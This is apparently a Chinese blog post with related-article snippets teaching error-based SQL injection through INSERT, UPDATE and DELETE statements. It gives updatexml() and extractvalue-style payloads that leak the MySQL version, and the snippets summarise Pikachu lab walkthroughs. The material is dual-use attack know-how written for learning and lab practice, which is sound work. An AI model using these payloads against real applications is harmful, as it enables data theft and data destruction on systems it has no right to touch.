insert,update和delete下的注入

最新推荐文章于 2025-05-29 15:37:13 发布
最新推荐文章于 2025-05-29 15:37:13 发布
阅读量108 收藏 1
点赞数
本文介绍了SQL注入中使用updatexml、extractvalue等函数进行数据提取的方法,包括insert、update和delete操作的具体语法示例。此外还提到了name_const()等其他潜在可用的技术。

PS:刚开始看到这个注入方式的时候,问米哥:“为啥updatexml就足以报错了,为啥还要使用insert?”知道答案的我觉得问了一个傻蛋的问题。不过没关系。慢慢积累。答案很简单,并不是所有的注入点程序里面执行的都是select语句,也可以是别的。比如insert、update、以及delete。

注入语法

insert into users (id, username, password) values (1,''inject here'','DEF');
insert into users (id, username, password) values (1,""inject here"",'DEF');

注意有个是单引号,有个是双引号。可根据实际场景灵活运用!

  updatexml of payload:and updatexml(1,concat(0x7e,(select @@version),0x7e),1)

insert:

insert into users(id,username,password) values(1,updatexml(null,concat(0x7e,(select @@version),0x7e),null),'DEF');

update:

update users set password='DEF' or updatexml(1,concat(0x7e,(select @@version),0x7e),2);

delect:

DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0);

 

当然了除了updatexml这个函数还有extractvalue函数。以及我还没有学到的“name_const()”

 

 

 

 

THE END

 

Pikachu-Sql Inject-insert/update/delete注入
guanrongl的专栏
10-03 831
总结:要注意开头部分的andor,and不行那就改用or,或者用替换符&&(and)||(or),其次是闭合的方式不只有#--+,还有or'先判断是否有SQL注入漏洞,经过判断之后发现存在SQL漏洞。构造insert的payload。由于插入id 这里有个or 的或运算,所以会执行 updatexml 方法,实现报错注入。基于delete 的报错注入。得到 delete 注入结果。update的 SQL语句。同理,update 注入。如构造输入payload。提交,获得数据库名;
基于insert update delete注入
qq_43814486的博客
04-04 971
inset注入原理: 所谓inset注入就是指我们前端注册的信息会被后台通过insert操作插入到数据库里边去,若此时后台没有做出相应的处理就会构成insert注入。 ...
insertupdatedelete注入
scu_hacker博客
01-07 1502
前言: 本文章主要总结不同于普通查询sql注入,而是稍微少见的insertupdatedelete注入。 一、常见形式 (1)insertinsert into users(id,username,passowrd) values (2,'注入点','Olivia'); payload可以为: 'or updatexml() or ' (2)update: update users set id=1,username='注入点',password=3 payload为: 'o...
insert/update/delete注入
qq_35599248的博客
01-11 3711
我们常见的sql注入一般都是基于select语句,但是在updateinsertdelete也可以注入。他们的原理都是当执行时遇到 (表达式1)(and/or)(表达式2) ,这种形式的式子时,前后表达式前后都会执行,然后做逻辑运算,最后的结果要么0,要么1。根据这个我也就可以理解每次sqlmap给出的payload的了 在此之前,我一直都习惯只闭合前面的引号,然后把后面的引号注释掉。一直都不能理解它给的payload为什么用了两个逻辑连接词,它是把前引号闭合后后面再构造一个随机字符串等式,这样中间
insert,delete,update注入
鸣蜩十四的博客
08-05 257
insert:通过增加这种方法,把数据库增加到表中,最后通过查看获得信息 例如在留言板中,通过注入,然后出现在留言板上 insert into 表名 values(null,‘111’,‘select user()’); delete:只能通过时间注入布尔注入的时候使用delete注入,通过查看删除一条数据的时间来慢慢测出数据 update:通过修改内容,把内容修改成你想知道的信息,通过查询可知 这三种注入也都支持报错注入 delete from admin where id=6 and 1=update
sql注入练习4(insertupdatedelete
kkzzjx
06-01 530
本次练习来源pikachu平台 文章目录检测万能密码类型判断(数字vs字符)数字型注入(post)搜索型注入(like)insert/update注入delete注入 检测 单引号 :报错 or 1=1# 数字型 ’ or 1=1# 字符型用引号闭合,同时加注释符号 and 1=1 数字型 and 1=1与原来一样,不用注释掉后面了 and 1=2 数字型 错误 ’ or 1=1# order by找数据数量等… 之后再补充一些常用的,比如绕过waf等 万能密码 万能密码是由于某些程序,通过采用判断
insertupdatedelete 注入方法
黑面狐
11-28 5101
我们常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查过滤的时候就会把恶意的数据插入数据库,从而造成SQL注入。 所有说除了查询之外,所有数据库进行交互的请求都有可能造成注入。如:插入数据,更改数据,删除数据等,所以现在根据网上的技巧汇总一下insertupdatedelete注入方法。 以下均为报错注入,测试数据库版本5.7.21 利用内置函数updatex...
MySQL开发(九):基础查询操作:SELECT、INSERTUPDATEDELETE
一名热衷于技术的全栈开发者,专注于前端与后端的全面技术探索。在这里,我将分享我在技术领域的学习与成长,助力更多开发者的进步。
10-27 1212
MySQL 的基础查询操作是每个开发者必备的技能。通过掌握SELECTINSERTUPDATEDELETE的用法,可以有效地管理数据库中的数据。本文提供了详细的示例表格,希望对您的 MySQL 学习之旅有所帮助。
Oracle 数据操作基础:INSERT/UPDATE/DELETE最佳实践
记录学习的过程
05-29 1401
本文详细介绍了Oracle数据库中的DML(数据操作语言)命令,包括INSERTUPDATEDELETEMERGE四大核心操作。首先概述了DML的特点,如需要显式提交、可回滚、产生重做日志等特性。然后分章节深入讲解了每个命令的语法使用方法:INSERT部分涵盖基本语法、多行插入技术高级功能;UPDATE部分说明基础更新、子查询更新批量更新;DELETE部分介绍基础删除高级技巧;最后重点解析了MERGE命令的"upsert"功能,展示如何实现数据同步操作。文章通过丰富的代码示
如何根据实体类的属性自动生成 insertupdatedelete select 语句
weixin_55915253的博客
12-31 1126
本文介绍了如何基于 Java 实体类的属性,通过注解反射机制自动生成常见的 SQL 语句(insertupdatedeleteselect通过这种方式,可以大大简化数据库操作的代码,避免重复编写 SQL 语句。同时,结合 MyBatis-Plus,能够更高效地进行数据操作。
利用insertupdatedelete注入获取数据
热门推荐
阿金正传
04-18 1万+
转自: http://drops.wooyun.org/tips/2078 0x00 简介 利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insertupdatedelete语句的注射点时(比如有的网站会记录用户浏览记录,包括refer
二维码工具(1).zip
最新发布
09-13
二维码工具(1).zip
基于ZXing修改的二维码扫描器.zip
09-12
基于ZXing修改的二维码扫描器.zip
在网页上生成二维码.zip
09-12
在网页上生成二维码.zip
四级流水线8位booth算法乘法器,有无符号都支持(verilog),含testbench(system verilog)
09-12
乘法器包含三个.v文件 乘法器可进行有符号与无符号的8位乘法计算,但是需要提前输入乘数是否为有符号的标识 【 顶层multiplier_8_special.v:对乘法器进行分割段数 booth2_pp_decoder.v:使用booth算法,将乘数进行转换 mult_pp_adder.v:执行部分积加法。(这里经过了部分优化,但是仍直接使用了‘+’符号,如果是asic设计,需要更加具体,也能进一步优化) tb_mult8_special.v:(tesetbench):仿真激励文件:20*4组随机数测试数据,会返回验证时出错的数据的部分原因。(system verilog) 】 经过初步仿真验证,无问题 经过vivado某个ultrascale型号的fpga实现过后能达到500mhz以上频率,资源使用量为120lut左右 此模块为tpu设计中的一个底层模块,(作为多复用单元,可以处理浮点数据的一个部分)后续会逐步上传tpu的其他部分以及功能原理介绍 注:sys_enable:模块启动信号,sys_enable=0时会暂停并暂存数据。 valid:valid=1输入乘数有效,valid=0无效则会不计算这个数据。
无限特征选择_一种基于图的特征过滤方法_Infinite Feature Selection_ a Graph-base
09-12
无限特征选择_一种基于图的特征过滤方法_Infinite Feature Selection_ a Graph-based Feature Filtering Approach.zip
达芬奇手术机器人阻抗控制的MATLAB仿真_MATLAB simulation of Impedance control
09-12
达芬奇手术机器人阻抗控制的MATLAB仿真_MATLAB simulation of Impedance control on da Vinci Surgical Robot.zip
自己写的二维码App.zip
09-13
自己写的二维码App.zip
pikachu中完成SQL-Inject模块进行SQL insert注入update注入delete注入以及http头注入实验
12-27
#### Delete 注入 删除类别的注入往往更加危险因为它可以直接导致数据丢失。当确认某处存在潜在风险点后,应当谨慎行事以免造成不可逆损害。下面给出了一种基于布尔盲注的方式去探测是否存在敏感表格名的方法论实例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值